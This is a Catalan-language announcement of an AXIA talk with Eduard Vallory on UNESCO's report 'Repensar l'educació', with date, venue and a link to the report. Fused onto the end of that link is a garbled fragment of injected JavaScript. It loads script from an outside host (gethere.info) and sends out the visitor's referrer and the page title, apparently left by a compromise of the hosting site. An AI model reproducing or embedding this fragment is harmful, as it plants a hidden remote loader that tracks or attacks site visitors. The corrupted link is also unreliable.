CONVERSA DIRECTIVA

La UNESCO, ha estat i és capdavantera en el debat mundial sobre l’educació, tal com ho demostren l’informe Faure (1972) que va defensar que l’educació s’ha de donar al llarg de tota la vida i l’informe Delors (1996) que recordava que l’educació va molt més enllà de saber, si no aprenem també a fer, a ser, i a viure junts.

Enguany la UNESCO ha presentat a Barcelona, l’informe Repensar l’educació en el qual es defineix l’educació com un bé comú mundial i ens urgeix a replantejar el propòsit de l’educació i l’organització de l’aprenentatge, per tal que des d’una visió holística i humanística se superin les dicotomies tradicionals entre aspectes cognitius, emocionals i ètics, alhora que ens alerta del risc de posar tot l’èmfasi en els resultats dels processos educatius deixant de banda el procés d’aprenentatge.

Atès que aquest informe no fa mai referència a l’aportació ni al paper que han de fer els directors i directores de centres en l’orientació de les noves polítiques educatives que han d’adoptar els estats, AXIA ha convidat el Sr. Eduard Vallory, president del Centre UNESCO de Catalunya, perquè debati i dialogui amb tots nosaltres sobre quin ha de ser el rol central dels directors i directores en la creació i impuls d’aquests nous entorns d’aprenentatge i en la reimaginació de l’educació.

Dimecres 28 d’octubre a les 17:30 hores

Hotel Zenit – sala Miró Dalí

C/ Comte Borrell, 208 de Barcelona

Aforament limitat

INSCRIPCIÓ TANCADA!!!

 

Enllaç al document Repensar l’Educació:

http://www.unescocat.org/fitxer/3683/Repensars.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;